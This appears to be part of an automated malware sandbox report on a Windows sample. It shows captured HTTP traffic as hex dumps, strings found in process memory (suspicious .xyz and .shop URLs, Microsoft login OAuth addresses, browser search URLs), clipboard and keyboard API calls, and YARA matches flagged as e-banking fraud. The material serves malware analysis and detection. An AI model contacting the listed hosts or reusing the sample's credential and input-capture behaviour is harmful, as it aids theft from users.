7f 89 16 af 8f 99 81 04 a7 f1 66 2f 3e 3c fa d9 5e 9b 41 9c 1b b0 58 2c 97 93 80 7c 7f d0 8e 4e 56 a7 bb a7 e4 78 48 3a fe fd 95 95 a8 ff 95 6c ef f1 bc ac 21 39 59 a3 5d 9f 06 23 fa f1 05 0d ba 99 2f 01 09 f7 49 f8 8d 6c 8e c8 fb 6e f4 b2 43 7a 09 dd fc b3 e4 8e 9d 3e d9 fa 44 b6 3f 64 1d 7e 7f b6 b4 cf 5c ee ec 08 b8 6f 6e e1 f8 ed 33 3a ec 4c 86 5b e4 f8 6c 1a 3c 67 00 99 9b 1d 49 f4 e3 80 6d 26 7d 7f 1a be 61 6c 57 79 d8 02 e9 9f 4f 86 7e 34 1e 93 47 83 2c 1b 19 9c 45 eb e3 69 e0 27 20 57 1c 12 ff 83 18 5b 72 8f 7e 01 9b 20 83 c3 5f 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 21a}n0=p66EN';-DnS7t@cB[&c?t)\pA,~}FVqAMC~\V&Pd+6j[YX-7#]<c**j*AtC#_W[`2l\*HWt+Lj!F%%)AXK:6B6D7@4(bW[I\8Ea3X$]Y\dGpHP\T5y^=SPmSw\.3Th2O3:}{Wdf/><^AX,|NVxH:l!9Y]#/IlnCz>D?d~\on3:L[l<gIm&}alWyO~4G,Ei' W[r~ _0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 10:25:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"6692a6ec-35f"Content-Encoding: gzipData Raw: 32 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 93 dd 6e d3 30 18 86 8f 8b c4 3d 84 70 ba 36 05 36 a9 45 4e 10 27 3b de 2d b8 a9 ab 44 ca 1f a9 db d0 b3 6e 53 37 aa 74 dd 40 63 42 5b 26 c4 18 63 08 01 1d 3f a2 74 29 5c 0c b5 9b 1c ed 16 70 12 b3 15 a8 c8 41 2c bf 7e fd 7d cf eb c4 e0 46 d5 56 71 cb 41 82 86 4d 43 b9 7e 0d 5c 8e 08 56 d9 98 03 26 c2 50 b0 a0 89 64 d1 b5 2b 36 ae 8b 82 6a 5b 18 59 58 16 2d 1b ba aa a6 37 91 f8 b7 b5 a9 23 cf b1 5d 3c 63 f6 f4 2a d6 e4 2a 6a ea 2a ca a7 93 05 41 b7 74 ac 43 23 5f 57 a1 81 e4 5b 85 e2 82 60 32 cd 6c 98 5c 2a 16 96 98 04 1f ce 48 b7 13 57 a3 8e dc 74 0e 2b 4c 6a 21 46 25 25 d8 29 82 aa 41 b7 8e 58 cb 06 ae e5 4b 09 1b c0 3a 36 90 42 83 36 dd 1b 44 af 37 e2 a3 c7 40 ca 34 b6 28 f1 b0 a0 62 57 5b 49 92 5c 0e 38 0a d0 16 15 45 61 8b 8b ec e5 a4 01 33 11 d4 58 24 96 cb b0 5d 59 bc b9 bc 5c 64 8f f8 47 ed 8b 70 1f 48 89 eb 9f ed 50 d0 5c 54 93 35 8c 9d bb 92 e4 79 5e a1 a5 3d 80 8e 53 50 6d 53 ba 77 a7 5c 2e 95 d2 1e ff 33 f0 9a 90 d7 e5 54 93 e1 68 32 da a0 4f de d1 dd ef f4 e0 33 fd b2 3a 7d da b9 08 7b 93 f3 57 64 a7 7f 89 16 af 8f 99 81 04 a7 f1 66 2f 3e 3c fa d9 5e 9b 41 9c 1b b0 58 2c 97 93 80 7c 7f d0 8e 4e 56 a7 bb a7 e4 78 48 3a fe fd 95 95 a8 ff 95 6c ef f1 bc ac 21 39 59 a3 5d 9f 06 23 fa f1 05 0d ba 99 2f 01 09 f7 49 f8 8d 6c 8e c8 fb 6e f4 b2 43 7a 09 dd fc b3 e4 8e 9d 3e d9 fa 44 b6 3f 64 1d 7e 7f b6 b4 cf 5c ee ec 08 b8 6f 6e e1 f8 ed 33 3a ec 4c 86 5b e4 f8 6c 1a 3c 67 00 99 9b 1d 49 f4 e3 80 6d 26 7d 7f 1a be 61 6c 57 79 d8 02 e9 9f 4f 86 7e 34 1e 93 47 83 2c 1b 19 9c 45 eb e3 69 e0 27 20 57 1c 12 ff 83 18 5b 72 8f 7e 01 9b 20 83 c3 5f 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 21a}n0=p66EN';-DnS7t@cB[&c?t)\pA,~}FVqAMC~\V&Pd+6j[YX-7#]<c**j*AtC#_W[`2l\*HWt+Lj!F%%)AXK:6B6D7@4(bW[I\8Ea3X$]Y\dGpHP\T5y^=SPmSw\.3Th2O3:}{Wdf/><^AX,|NVxH:l!9Y]#/IlnCz>D?d~\on3:L[l<gIm&}alWyO~4G,Ei' W[r~ _0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 10:25:38 GMTContent-Type: text/htmlContent-Length: 863Connection: closeVary: Accept-EncodingETag: "6692a6ec-35f"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 30 2e 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 32 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e e6 9c 80 e6 96 b0 e8 a7 86 e9 a2 91 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 09 09 09 3c 70 3e 3c 68 34 3e 3e 3e 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 09 3c 70 3e 3c 68 34 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e6 9c 80 e6 96 b0 e8 a7 86 e9 a2 91 ef bc 9a 3c 2f 66 6f 6e 74 3e 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 09 3c 70 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 79 68 71 61 70 70 2e 63 6f 6d 2f 3f 33 39 39 38 38 3e 3c 68 34 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 79 68 71 61 70 70 2e 63 6f 6d 2f 3f 33 39 39 38 38 3c 2f 68 34 3e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 68 34 3e e4 b8 ba e4 ba 86 e6 92 ad e6 94 be e6 9b b4 e6 b5 81 e7 95 85 ef bc 8c e4 bb a5 e5 90 8e e6 96 b0 e8 a7 86 e9 a2 91 e9 83 bd e6 94 be e5 9c a8 e9 87 8c e9 9d a2 e3 80 82 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 68 34 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 39 39 30 30 22 3e e8 a7 86 e9 a2 91 e9 9c 80 e8 a6 81 e7 94 a8 e5 a4 b8 e5 85 8b 41 50 50 e8 8e b7 e5 8f 96 3c 2f 66 6f 6e 74 3e ef bc 8c e5 a6 82 e6 89 8b e6 9c ba e6 b2 a1 e6 9c 89 e5 a4 b8 e5 85 8b ef bc 8c e4 bc 9a e5 bc b9 e5 87 ba e5 ae 89 e8 a3 85 e5 8c 85 ef bc 8c 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e5 ae 89 e8 a3 85 e5 90 8e e5 8d b3 e5 8f af e8 8e b7 e5 8f 96 e8 a7 86 e9 a2 91 3c 2f 66 6f 6e 74 3e e3 80 82 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 68 34 3e e4 b8 ba e4 ba 86 e8 a7 86 e9 a2 91 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e9 ab 98 e6 b8 85 e4 b8 8d e5 a4 b1 e7 9c 9f ef bc 8c e8 a7 86 e9 a2 91 e6 94 be e8 bf 9b e4 ba 86 e5 8e 8b e7 bc a9 e5 8c 85 3c 2f 66 6f 6e 74 3e ef bc 8c e8 bf 9b e5 8e bb e4 b8 8b e8 bd bd e5 88 b0 e6 89 8b e6 9c ba e5 b0 b1 e8 83 bd e7 9c 8b e3 80 82 3c 68 34 3e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html><head><meta name="robots" content="noarchive"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=ye
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 29 Aug 2024 10:25:43 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 29 Aug 2024 10:25:46 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 29 Aug 2024 10:25:50 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: eypfpUNFpbLX.exe, 00000009.00000002.4026387029.0000000004FE7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.030002721.xyz
Source: eypfpUNFpbLX.exe, 00000009.00000002.4026387029.0000000004FE7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.030002721.xyz/jpse/
Source: compact.exe, 00000007.00000002.4026214953.0000000003F4E000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.000000000370E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.fimgroup.net:80/m3ft/?cLStcv3=mm8fgD9
Source: eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000003A32000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.yhqapp.com/?39988
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: compact.exe, 00000007.00000002.4015509843.0000000000745000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oau
Source: compact.exe, 00000007.00000002.4015509843.0000000000745000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2644562569.000000000074B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: compact.exe, 00000007.00000003.2643680914.00000000075BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: compact.exe, 00000007.00000002.4026214953.0000000003C2A000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000007.00000002.4028193261.0000000005B90000.00000004.00000800.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.00000000033EA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: compact.exe, 00000007.00000002.4026214953.0000000003DBC000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.000000000357C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.kiristyle.shop/m39s/?oLy=-hKdflfxw6&cLStcv3=UQp9655FjW3LvDLkuw2PvKQDrSZERfsuMNaS
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C0EAFF
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00C0ED6A
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C0EAFF
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_00BFAA57
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C29576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00C29576

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
